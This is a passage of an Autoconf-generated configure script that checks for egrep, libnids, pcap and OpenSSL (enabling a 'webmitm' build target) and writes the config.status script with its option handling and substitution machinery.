"$ac_path_EGREP_TRADITIONAL" || continue # Check for GNU ac_path_EGREP_TRADITIONAL and select it if it is found. # Check for GNU $ac_path_EGREP_TRADITIONAL case `"$ac_path_EGREP_TRADITIONAL" --version 2>&1` in #( *GNU*) ac_cv_path_EGREP_TRADITIONAL="$ac_path_EGREP_TRADITIONAL" ac_path_EGREP_TRADITIONAL_found=:;; #( *) ac_count=0 printf %s 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" printf "%s\n" 'EGREP_TRADITIONAL' >> "conftest.nl" "$ac_path_EGREP_TRADITIONAL" -E 'EGR(EP|AC)_TRADITIONAL$' < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_EGREP_TRADITIONAL_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_EGREP_TRADITIONAL="$ac_path_EGREP_TRADITIONAL" ac_path_EGREP_TRADITIONAL_max=$ac_count fi # 10*(2^10) chars as input seems more than enough test $ac_count -gt 10 && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac $ac_path_EGREP_TRADITIONAL_found && break 3 done done done IFS=$as_save_IFS if test -z "$ac_cv_path_EGREP_TRADITIONAL"; then : fi else ac_cv_path_EGREP_TRADITIONAL=$EGREP_TRADITIONAL fi if test "$ac_cv_path_EGREP_TRADITIONAL" then : ac_cv_path_EGREP_TRADITIONAL="$ac_cv_path_EGREP_TRADITIONAL -E" else case e in #( e) if test -z "$EGREP_TRADITIONAL"; then ac_path_EGREP_TRADITIONAL_found=false # Loop through the user's path and test for each of PROGNAME-LIST as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_prog in egrep do for ac_exec_ext in '' $ac_executable_extensions; do ac_path_EGREP_TRADITIONAL="$as_dir$ac_prog$ac_exec_ext" as_fn_executable_p "$ac_path_EGREP_TRADITIONAL" || continue # Check for GNU ac_path_EGREP_TRADITIONAL and select it if it is found. # Check for GNU $ac_path_EGREP_TRADITIONAL case `"$ac_path_EGREP_TRADITIONAL" --version 2>&1` in #( *GNU*) ac_cv_path_EGREP_TRADITIONAL="$ac_path_EGREP_TRADITIONAL" ac_path_EGREP_TRADITIONAL_found=:;; #( *) ac_count=0 printf %s 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" printf "%s\n" 'EGREP_TRADITIONAL' >> "conftest.nl" "$ac_path_EGREP_TRADITIONAL" 'EGR(EP|AC)_TRADITIONAL$' < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_EGREP_TRADITIONAL_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_EGREP_TRADITIONAL="$ac_path_EGREP_TRADITIONAL" ac_path_EGREP_TRADITIONAL_max=$ac_count fi # 10*(2^10) chars as input seems more than enough test $ac_count -gt 10 && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac $ac_path_EGREP_TRADITIONAL_found && break 3 done done done IFS=$as_save_IFS if test -z "$ac_cv_path_EGREP_TRADITIONAL"; then as_fn_error $? "no acceptable egrep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 fi else ac_cv_path_EGREP_TRADITIONAL=$EGREP_TRADITIONAL fi ;; esac fi ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_EGREP_TRADITIONAL" >&5 printf "%s\n" "$ac_cv_path_EGREP_TRADITIONAL" >&6; } EGREP_TRADITIONAL=$ac_cv_path_EGREP_TRADITIONAL cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | $EGREP_TRADITIONAL "pcap_filter" >/dev/null 2>&1 then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } else case e in #( e) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; }; as_fn_error $? "libnids version 1.13 or greater required" "$LINENO" 5 ;; esac fi rm -rf conftest* CPPFLAGS="$save_cppflags" { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for OpenSSL" >&5 printf %s "checking for OpenSSL... " >&6; } # Check whether --with-openssl was given. if test ${with_openssl+y} then : withval=$with_openssl; case "$withval" in yes|no) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } ;; *) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $withval" >&5 printf "%s\n" "$withval" >&6; } if test -f $withval/include/openssl/ssl.h -a -f $withval/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval -lssl -lcrypto" elif test -f $withval/include/openssl/ssl.h -a \ -f $withval/lib/libssl.a; then owd=`pwd` if cd $withval; then withval=`pwd`; cd $owd; fi SSLINC="-I$withval/include" SSLLIB="-L$withval/lib -lssl -lcrypto" else as_fn_error $? "ssl.h or libssl.a not found in $withval" "$LINENO" 5 fi WEBMITM="webmitm" ;; esac else case e in #( e) if test -f ${prefix}/include/openssl/ssl.h; then SSLINC="-I${prefix}/include" SSLLIB="-L${prefix}/lib -lssl -lcrypto" elif test -f ${prefix}/ssl/include/openssl/ssl.h; then SSLINC="-I${prefix}/ssl/include" SSLLIB="-L${prefix}/ssl/lib -lssl -lcrypto" elif test -f /usr/include/openssl/ssl.h; then SSLLIB="-lssl -lcrypto" else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } as_fn_error $? "OpenSSL not found" "$LINENO" 5 fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } ;; esac fi ac_config_files="$ac_config_files Makefile" cat >confcache <<\_ACEOF # This file is a shell script that caches the results of configure # tests run on this system so they can be shared between configure # scripts and configure runs, see configure's option --config-cache. # It is not useful on other systems. If it contains results you don't # want to keep, you may remove or edit it. # # config.status only pays attention to the cache file if you give it # the --recheck option to rerun configure. # # 'ac_cv_env_foo' variables (set or unset) will be overridden when # loading this file, other *unset* 'ac_cv_foo' will be assigned the # following values. _ACEOF # The following way of writing the cache mishandles newlines in values, # but we know of no workaround that is simple, portable, and efficient. # So, we kill variables containing newlines. # Ultrix sh set writes to stderr and can't be redirected directly, # and sets the high bit in the cache file unless we assign to the vars. ( for ac_var in `(set) 2>&1 | sed -n 's/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'`; do eval ac_val=\$$ac_var case $ac_val in #( *${as_nl}*) case $ac_var in #( *_cv_*) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 printf "%s\n" "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; esac case $ac_var in #( _ | IFS | as_nl) ;; #( BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( *) { eval $ac_var=; unset $ac_var;} ;; esac ;; esac done (set) 2>&1 | case $as_nl`(ac_space=' '; set) 2>&1` in #( *${as_nl}ac_space=\ *) # 'set' does not quote correctly, so add quotes: double-quote # substitution turns \\\\ into \\, and sed turns \\ into \. sed -n \ "s/'/'\\\\''/g; s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\\2'/p" ;; #( *) # 'set' quotes correctly as required by POSIX, so do not add quotes. sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" ;; esac | sort ) | sed ' /^ac_cv_env_/b end t clear :clear s/^\([^=]*\)=\(.*[{}].*\)$/test ${\1+y} || &/ t end s/^\([^=]*\)=\(.*\)$/\1=${\1=\2}/ :end' >>confcache if diff "$cache_file" confcache >/dev/null 2>&1; then :; else if test -w "$cache_file"; then if test "x$cache_file" != "x/dev/null"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: updating cache $cache_file" >&5 printf "%s\n" "$as_me: updating cache $cache_file" >&6;} if test ! -f "$cache_file" || test -h "$cache_file"; then cat confcache >"$cache_file" else case $cache_file in #( */* | ?:*) mv -f confcache "$cache_file"$$ && mv -f "$cache_file"$$ "$cache_file" ;; #( *) mv -f confcache "$cache_file" ;; esac fi fi else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: not updating unwritable cache $cache_file" >&5 printf "%s\n" "$as_me: not updating unwritable cache $cache_file" >&6;} fi fi rm -f confcache test "x$prefix" = xNONE && prefix=$ac_default_prefix # Let make expand exec_prefix. test "x$exec_prefix" = xNONE && exec_prefix='${prefix}' DEFS=-DHAVE_CONFIG_H ac_libobjs= ac_ltlibobjs= U= for ac_i in : $LIBOBJS; do test "x$ac_i" = x: && continue # 1. Remove the extension, and $U if already installed. ac_script='s/\$U\././;s/\.o$//;s/\.obj$//' ac_i=`printf "%s\n" "$ac_i" | sed "$ac_script"` # 2. Prepend LIBOBJDIR. When used with automake>=1.10 LIBOBJDIR # will be set to the directory where LIBOBJS objects are built. as_fn_append ac_libobjs " \${LIBOBJDIR}$ac_i\$U.$ac_objext" as_fn_append ac_ltlibobjs " \${LIBOBJDIR}$ac_i"'$U.lo' done LIBOBJS=$ac_libobjs LTLIBOBJS=$ac_ltlibobjs : "${CONFIG_STATUS=./config.status}" ac_write_fail=0 ac_clean_files_save=$ac_clean_files ac_clean_files="$ac_clean_files $CONFIG_STATUS" { printf "%s\n" "$as_me:${as_lineno-$LINENO}: creating $CONFIG_STATUS" >&5 printf "%s\n" "$as_me: creating $CONFIG_STATUS" >&6;} as_write_fail=0 cat >$CONFIG_STATUS <<_ASEOF || as_write_fail=1 #! $SHELL # Generated by $as_me. # Run this file to recreate the current configuration. # Compiler output produced by configure, useful for debugging # configure, is in config.log if it exists. debug=false ac_cs_recheck=false ac_cs_silent=false SHELL=\${CONFIG_SHELL-$SHELL} export SHELL _ASEOF cat >>$CONFIG_STATUS <<\_ASEOF || as_write_fail=1 ## -------------------- ## ## M4sh Initialization. ## ## -------------------- ## # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh if test ${ZSH_VERSION+y} && (emulate sh) >/dev/null 2>&1 then : emulate sh NULLCMD=: # Pre-4.2 versions of Zsh do word splitting on ${1+"$@"}, which # is contrary to our usage. Disable this feature. alias -g '${1+"$@"}'='"$@"' setopt NO_GLOB_SUBST else case e in #( e) case `(set -o) 2>/dev/null` in #( *posix*) : set -o posix ;; #( *) : ;; esac ;; esac fi # Reset variables that may have inherited troublesome values from # the environment. # IFS needs to be set, to space, tab, and newline, in precisely that order. # (If _AS_PATH_WALK were called with IFS unset, it would have the # side effect of setting IFS to empty, thus disabling word splitting.) # Quoting is to prevent editors from complaining about space-tab. as_nl=' ' export as_nl IFS=" "" $as_nl" PS1='$ ' PS2='> ' PS4='+ ' # Ensure predictable behavior from utilities with locale-dependent output. LC_ALL=C export LC_ALL LANGUAGE=C export LANGUAGE # We cannot yet rely on "unset" to work, but we need these variables # to be unset--not just set to an empty or harmless value--now, to # avoid bugs in old shells (e.g. pre-3.0 UWIN ksh). This construct # also avoids known problems related to "unset" and subshell syntax # in other old shells (e.g. bash 2.01 and pdksh 5.2.14). for as_var in BASH_ENV ENV MAIL MAILPATH CDPATH do eval test \${$as_var+y} \ && ( (unset $as_var) || exit 1) >/dev/null 2>&1 && unset $as_var || : done # Ensure that fds 0, 1, and 2 are open. if (exec 3>&0) 2>/dev/null; then :; else exec 0&1) 2>/dev/null; then :; else exec 1>/dev/null; fi if (exec 3>&2) ; then :; else exec 2>/dev/null; fi # The user is always right. if ${PATH_SEPARATOR+false} :; then PATH_SEPARATOR=: (PATH='/bin;/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 && { (PATH='/bin:/bin'; FPATH=$PATH; sh -c :) >/dev/null 2>&1 || PATH_SEPARATOR=';' } fi # Find who we are. Look in the path if we contain no directory separator. as_myself= case $0 in #(( *[\\/]* ) as_myself=$0 ;; *) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac test -r "$as_dir$0" && as_myself=$as_dir$0 && break done IFS=$as_save_IFS ;; esac # We did not find ourselves, most probably we were run as 'sh COMMAND' # in which case we are not to be found in the path. if test "x$as_myself" = x; then as_myself=$0 fi if test ! -f "$as_myself"; then printf "%s\n" "$as_myself: error: cannot find myself; rerun with an absolute file name" >&2 exit 1 fi # as_fn_error STATUS ERROR [LINENO LOG_FD] # ---------------------------------------- # Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are # provided, also output the error to LOG_FD, referencing LINENO. Then exit the # script with STATUS, using 1 if that was 0. as_fn_error () { as_status=$1; test $as_status -eq 0 && as_status=1 if test "$4"; then as_lineno=${as_lineno-"$3"} as_lineno_stack=as_lineno_stack=$as_lineno_stack printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: $2" >&$4 fi printf "%s\n" "$as_me: error: $2" >&2 as_fn_exit $as_status } # as_fn_error # as_fn_set_status STATUS # ----------------------- # Set $? to STATUS, without forking. as_fn_set_status () { return $1 } # as_fn_set_status # as_fn_exit STATUS # ----------------- # Exit the shell with STATUS, even in a "trap 0" or "set -e" context. as_fn_exit () { set +e as_fn_set_status $1 exit $1 } # as_fn_exit # as_fn_unset VAR # --------------- # Portably unset VAR. as_fn_unset () { { eval $1=; unset $1;} } as_unset=as_fn_unset # as_fn_append VAR VALUE # ---------------------- # Append the text in VALUE to the end of the definition contained in VAR. Take # advantage of any shell optimizations that allow amortized linear growth over # repeated appends, instead of the typical quadratic growth present in naive # implementations. if (eval "as_var=1; as_var+=2; test x\$as_var = x12") 2>/dev/null then : eval 'as_fn_append () { eval $1+=\$2 }' else case e in #( e) as_fn_append () { eval $1=\$$1\$2 } ;; esac fi # as_fn_append # as_fn_arith ARG... # ------------------ # Perform arithmetic evaluation on the ARGs, and store the result in the # global $as_val. Take advantage of shells that can avoid forks. The arguments # must be portable across $(()) and expr. if (eval "test \$(( 1 + 1 )) = 2") 2>/dev/null then : eval 'as_fn_arith () { as_val=$(( $* )) }' else case e in #( e) as_fn_arith () { as_val=`expr "$@" || test $? -eq 1` } ;; esac fi # as_fn_arith if expr a : '\(a\)' >/dev/null 2>&1 && test "X`expr 00001 : '.*\(...\)'`" = X001; then as_expr=expr else as_expr=false fi if (basename -- /) >/dev/null 2>&1 && test "X`basename -- / 2>&1`" = "X/"; then as_basename=basename else as_basename=false fi if (as_dir=`dirname -- /` && test "X$as_dir" = X/) >/dev/null 2>&1; then as_dirname=dirname else as_dirname=false fi as_me=`$as_basename -- "$0" || $as_expr X/"$0" : '.*/\([^/][^/]*\)/*$' \| \ X"$0" : 'X\(//\)$' \| \ X"$0" : 'X\(/\)' \| . 2>/dev/null || printf "%s\n" X/"$0" | sed '/^.*\/\([^/][^/]*\)\/*$/{ s//\1/ q } /^X\/\(\/\/\)$/{ s//\1/ q } /^X\/\(\/\).*/{ s//\1/ q } s/.*/./; q'` # Avoid depending upon Character Ranges. as_cr_letters='abcdefghijklmnopqrstuvwxyz' as_cr_LETTERS='ABCDEFGHIJKLMNOPQRSTUVWXYZ' as_cr_Letters=$as_cr_letters$as_cr_LETTERS as_cr_digits='0123456789' as_cr_alnum=$as_cr_Letters$as_cr_digits # Determine whether it's possible to make 'echo' print without a newline. # These variables are no longer used directly by Autoconf, but are AC_SUBSTed # for compatibility with existing Makefiles. ECHO_C= ECHO_N= ECHO_T= case `echo -n x` in #((((( -n*) case `echo 'xy\c'` in *c*) ECHO_T=' ';; # ECHO_T is single tab character. xy) ECHO_C='\c';; *) echo `echo ksh88 bug on AIX 6.1` > /dev/null ECHO_T=' ';; esac;; *) ECHO_N='-n';; esac # For backward compatibility with old third-party macros, we provide # the shell variables $as_echo and $as_echo_n. New code should use # AS_ECHO(["message"]) and AS_ECHO_N(["message"]), respectively. as_echo='printf %s\n' as_echo_n='printf %s' rm -f conf$$ conf$$.exe conf$$.file if test -d conf$$.dir; then rm -f conf$$.dir/conf$$.file else rm -f conf$$.dir mkdir conf$$.dir 2>/dev/null fi if (echo >conf$$.file) 2>/dev/null; then if ln -s conf$$.file conf$$ 2>/dev/null; then as_ln_s='ln -s' # ... but there are two gotchas: # 1) On MSYS, both 'ln -s file dir' and 'ln file dir' fail. # 2) DJGPP < 2.04 has no symlinks; 'ln -s' creates a wrapper executable. # In both cases, we have to default to 'cp -pR'. ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || as_ln_s='cp -pR' elif ln conf$$.file conf$$ 2>/dev/null; then as_ln_s=ln else as_ln_s='cp -pR' fi else as_ln_s='cp -pR' fi rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file rmdir conf$$.dir 2>/dev/null # as_fn_mkdir_p # ------------- # Create "$as_dir" as a directory, including parents if necessary. as_fn_mkdir_p () { case $as_dir in #( -*) as_dir=./$as_dir;; esac test -d "$as_dir" || eval $as_mkdir_p || { as_dirs= while :; do case $as_dir in #( *\'*) as_qdir=`printf "%s\n" "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'( *) as_qdir=$as_dir;; esac as_dirs="'$as_qdir' $as_dirs" as_dir=`$as_dirname -- "$as_dir" || $as_expr X"$as_dir" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$as_dir" : 'X\(//\)[^/]' \| \ X"$as_dir" : 'X\(//\)$' \| \ X"$as_dir" : 'X\(/\)' \| . 2>/dev/null || printf "%s\n" X"$as_dir" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` test -d "$as_dir" && break done test -z "$as_dirs" || eval "mkdir $as_dirs" } || test -d "$as_dir" || as_fn_error $? "cannot create directory $as_dir" } # as_fn_mkdir_p if mkdir -p . 2>/dev/null; then as_mkdir_p='mkdir -p "$as_dir"' else test -d ./-p && rmdir ./-p as_mkdir_p=false fi # as_fn_executable_p FILE # ----------------------- # Test if FILE is an executable regular file. as_fn_executable_p () { test -f "$1" && test -x "$1" } # as_fn_executable_p as_test_x='test -x' as_executable_p=as_fn_executable_p # Sed expression to map a string onto a valid CPP name. as_sed_cpp="y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g" as_tr_cpp="eval sed '$as_sed_cpp'" # deprecated # Sed expression to map a string onto a valid variable name. as_sed_sh="y%*+%pp%;s%[^_$as_cr_alnum]%_%g" as_tr_sh="eval sed '$as_sed_sh'" # deprecated exec 6>&1 ## ----------------------------------- ## ## Main body of $CONFIG_STATUS script. ## ## ----------------------------------- ## _ASEOF test $as_write_fail = 0 && chmod +x $CONFIG_STATUS || ac_write_fail=1 cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # Save the log message, to keep $0 and so on meaningful, and to # report actual input values of CONFIG_FILES etc. instead of their # values after options handling. ac_log=" This file was extended by $as_me, which was generated by GNU Autoconf 2.72. Invocation command line was CONFIG_FILES = $CONFIG_FILES CONFIG_HEADERS = $CONFIG_HEADERS CONFIG_LINKS = $CONFIG_LINKS CONFIG_COMMANDS = $CONFIG_COMMANDS $ $0 $@ on `(hostname || uname -n) 2>/dev/null | sed 1q` " _ACEOF case $ac_config_files in *" "*) set x $ac_config_files; shift; ac_config_files=$*;; esac case $ac_config_headers in *" "*) set x $ac_config_headers; shift; ac_config_headers=$*;; esac cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 # Files that config.status was made for. config_files="$ac_config_files" config_headers="$ac_config_headers" _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 ac_cs_usage="\ '$as_me' instantiates files and other configuration actions from templates according to the current configuration. Unless the files and actions are specified as TAGs, all are instantiated by default. Usage: $0 [OPTION]... [TAG]... -h, --help print this help, then exit -V, --version print version number and configuration settings, then exit --config print configuration, then exit -q, --quiet, --silent do not print progress messages -d, --debug don't remove temporary files --recheck update $as_me by reconfiguring in the same conditions --file=FILE[:TEMPLATE] instantiate the configuration file FILE --header=FILE[:TEMPLATE] instantiate the configuration header FILE Configuration files: $config_files Configuration headers: $config_headers Report bugs to the package provider." _ACEOF ac_cs_config=`printf "%s\n" "$ac_configure_args" | sed "$ac_safe_unquote"` ac_cs_config_escaped=`printf "%s\n" "$ac_cs_config" | sed "s/^ //; s/'/'\\\\\\\\''/g"` cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_cs_config='$ac_cs_config_escaped' ac_cs_version="\\ config.status configured by $0, generated by GNU Autoconf 2.72, with options \\"\$ac_cs_config\\" Copyright (C) 2023 Free Software Foundation, Inc. This config.status script is free software; the Free Software Foundation gives unlimited permission to copy, distribute and modify it." ac_pwd='$ac_pwd' srcdir='$srcdir' INSTALL='$INSTALL' test -n "\$AWK" || AWK=awk _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # The default lists apply if the user does not specify any file. ac_need_defaults=: while test $# != 0 do case $1 in --*=?*) ac_option=`expr "X$1" : 'X\([^=]*\)='` ac_optarg=`expr "X$1" : 'X[^=]*=\(.*\)'` ac_shift=: ;; --*=) ac_option=`expr "X$1" : 'X\([^=]*\)='` ac_optarg= ac_shift=: ;; *) ac_option=$1 ac_optarg=$2 ac_shift=shift ;; esac case $ac_option in # Handling of the options. -recheck | --recheck | --rechec | --reche | --rech | --rec | --re | --r) ac_cs_recheck=: ;; --version | --versio | --versi | --vers | --ver | --ve | --v | -V ) printf "%s\n" "$ac_cs_version"; exit ;; --config | --confi | --conf | --con | --co | --c ) printf "%s\n" "$ac_cs_config"; exit ;; --debug | --debu | --deb | --de | --d | -d ) debug=: ;; --file | --fil | --fi | --f ) $ac_shift case $ac_optarg in *\'*) ac_optarg=`printf "%s\n" "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; '') as_fn_error $? "missing file argument" ;; esac as_fn_append CONFIG_FILES " '$ac_optarg'" ac_need_defaults=false;; --header | --heade | --head | --hea ) $ac_shift case $ac_optarg in *\'*) ac_optarg=`printf "%s\n" "$ac_optarg" | sed "s/'/'\\\\\\\\''/g"` ;; esac as_fn_append CONFIG_HEADERS " '$ac_optarg'" ac_need_defaults=false;; --he | --h) # Conflict between --help and --header as_fn_error $? "ambiguous option: '$1' Try '$0 --help' for more information.";; --help | --hel | -h ) printf "%s\n" "$ac_cs_usage"; exit ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil | --si | --s) ac_cs_silent=: ;; # This is an error. -*) as_fn_error $? "unrecognized option: '$1' Try '$0 --help' for more information." ;; *) as_fn_append ac_config_targets " $1" ac_need_defaults=false ;; esac shift done ac_configure_extra_args= if $ac_cs_silent; then exec 6>/dev/null ac_configure_extra_args="$ac_configure_extra_args --silent" fi _ACEOF cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 if \$ac_cs_recheck; then set X $SHELL '$0' $ac_configure_args \$ac_configure_extra_args --no-create --no-recursion shift \printf "%s\n" "running CONFIG_SHELL=$SHELL \$*" >&6 CONFIG_SHELL='$SHELL' export CONFIG_SHELL exec "\$@" fi _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 exec 5>>config.log { echo sed 'h;s/./-/g;s/^.../## /;s/...$/ ##/;p;x;p;x' <<_ASBOX ## Running $as_me. ## _ASBOX printf "%s\n" "$ac_log" } >&5 _ACEOF cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # Handling of arguments. for ac_config_target in $ac_config_targets do case $ac_config_target in "config.h") CONFIG_HEADERS="$CONFIG_HEADERS config.h" ;; "Makefile") CONFIG_FILES="$CONFIG_FILES Makefile" ;; *) as_fn_error $? "invalid argument: '$ac_config_target'" "$LINENO" 5;; esac done # If the user did not use the arguments to specify the items to instantiate, # then the envvar interface is used. Set only those that are not. # We use the long form for the default assignment because of an extremely # bizarre bug on SunOS 4.1.3. if $ac_need_defaults; then test ${CONFIG_FILES+y} || CONFIG_FILES=$config_files test ${CONFIG_HEADERS+y} || CONFIG_HEADERS=$config_headers fi # Have a temporary directory for convenience. Make it in the build tree # simply because there is no reason against having it here, and in addition, # creating and moving files from /tmp can sometimes cause problems. # Hook for its removal unless debugging. # Note that there is a small window in which the directory will not be cleaned: # after its creation but before its name has been assigned to '$tmp'. $debug || { tmp= ac_tmp= trap 'exit_status=$? : "${ac_tmp:=$tmp}" { test ! -d "$ac_tmp" || rm -fr "$ac_tmp"; } && exit $exit_status ' 0 trap 'as_fn_exit 1' 1 2 13 15 } # Create a (secure) tmp directory for tmp files. { tmp=`(umask 077 && mktemp -d "./confXXXXXX") 2>/dev/null` && test -d "$tmp" } || { tmp=./conf$$-$RANDOM (umask 077 && mkdir "$tmp") } || as_fn_error $? "cannot create a temporary directory in ." "$LINENO" 5 ac_tmp=$tmp # Set up the scripts for CONFIG_FILES section. # No need to generate them if there are no CONFIG_FILES. # This happens for instance with './config.status config.h'. if test -n "$CONFIG_FILES"; then ac_cr=`echo X | tr X '\015'` # On cygwin, bash can eat \r inside `` if the user requested igncr. # But we know of no other shell where ac_cr would be empty at this # point, so we can use a bashism as a fallback. if test "x$ac_cr" = x; then eval ac_cr=\$\'\\r\' fi ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' /dev/null` if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then ac_cs_awk_cr='\\r' else ac_cs_awk_cr=$ac_cr fi echo 'BEGIN {' >"$ac_tmp/subs1.awk" && _ACEOF { echo "cat >conf$$subs.awk <<_ACEOF" && echo "$ac_subst_vars" | sed 's/.*/&!$&$ac_delim/' && echo "_ACEOF" } >conf$$subs.sh || as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5 ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'` ac_delim='%!_!# ' for ac_last_try in false false false false false :; do . ./conf$$subs.sh || as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5 ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X` if test $ac_delim_n = $ac_delim_num; then break elif $ac_last_try; then as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5 else ac_delim="$ac_delim!$ac_delim _$ac_delim!! " fi done rm -f conf$$subs.sh cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 cat >>"\$ac_tmp/subs1.awk" <<\\_ACAWK && _ACEOF sed -n ' h s/^/S["/; s/!.*/"]=/ p g s/^[^!]*!// :repl t repl s/'"$ac_delim"'$// t delim :nl h s/\(.\{148\}\)..*/\1/ t more1 s/["\\]/\\&/g; s/^/"/; s/$/\\n"\\/ p n b repl :more1 s/["\\]/\\&/g; s/^/"/; s/$/"\\/ p g s/.\{148\}// t nl :delim h s/\(.\{148\}\)..*/\1/ t more2 s/["\\]/\\&/g; s/^/"/; s/$/"/ p b :more2 s/["\\]/\\&/g; s/^/"/; s/$/"\\/ p g s/.\{148\}// t delim ' >$CONFIG_STATUS || ac_write_fail=1 rm -f conf$$subs.awk cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 _ACAWK cat >>"\$ac_tmp/subs1.awk" <<_ACAWK && for (key in S) S_is_set[key] = 1 FS = "" } { line = $ 0 nfields = split(line, field, "@") substed = 0 len = length(field[1]) for (i = 2; i < nfields; i++) { key = field[i] keylen = length(key) if (S_is_set[key]) { value = S[key] line = substr(line, 1, len) "" value "" substr(line, len + keylen + 3) len += length(value) + length(field[++i]) substed = 1 } else len += 1 + keylen } print line } _ACAWK _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 if sed "s/$ac_cr//" < /dev/null > /dev/null 2>&1; then sed "s/$ac_cr\$//; s/$ac_cr/$ac_cs_awk_cr/g" else cat fi < "$ac_tmp/subs1.awk" > "$ac_tmp/subs.awk" \ || as_fn_error $? "could not setup config files machinery" "$LINENO" 5 _ACEOF # VPATH may cause trouble with some makes, so we remove sole $(srcdir), # ${srcdir} and @srcdir@ entries from VPATH if srcdir is ".", strip leading and # trailing colons and then remove the whole line if VPATH becomes empty # (actually we leave an empty line to preserve line numbers). if test "x$srcdir" = x.; then ac_vpsub='/^[ ]*VPATH[ ]*=[ ]*/{ h s/// s/^/:/ s/[ ]*$/:/ s/:\$(srcdir):/:/g s/:\${srcdir}:/:/g s/:@srcdir@:/:/g s/^:*// s/:*$// x s/\(=[ ]*\).*/\1/ G s/\n// s/^[^=]*=[ ]*$// }' fi cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 fi # test -n "$CONFIG_FILES" # Set up the scripts for CONFIG_HEADERS section. # No need to generate them if there are no CONFIG_HEADERS. # This happens for instance with './config.status Makefile'. if test -n "$CONFIG_HEADERS"; then cat >"$ac_tmp/defines.awk" <<\_ACAWK || BEGIN { _ACEOF # Transform confdefs.h into an awk script 'defines.awk', embedded as # here-document in config.status, that substitutes the proper 